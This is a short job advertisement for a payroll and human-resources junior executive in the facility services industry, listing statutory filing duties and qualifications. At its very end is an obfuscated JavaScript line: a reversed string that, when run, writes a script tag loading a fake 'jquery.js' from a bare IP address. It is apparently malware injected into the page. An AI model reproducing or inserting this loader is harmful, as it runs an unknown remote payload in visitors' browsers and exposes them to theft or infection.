Industry : Facility Services
– Process payroll in a timely and accurate manner
– Generate payroll report and journal
– Statutory reporting, payment, correspondence and filing requirement: EPF, SOCSO, Income Tax, etc.
– Any other job responsibilities as and when required by the Superior.
– Able to work independently with minimal supervision.
– Candidate must possess at least a Diploma, Advanced/Higher/Graduate Diploma, Bachelor’s Degree, Post Graduate Diploma, Professional Degree, Human Resource Management, Business Studies/Administration/Management or equivalent.
– Required language(s): English, Bahasa Malaysia, Chinese,
– At least 1 year(s) of working experience in the related field is preferred, but fresh graduate are welcome to apply.
– Preferably Junior Executives specializing in Human Resources or equivalent.
– Full-Time position(s) available. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))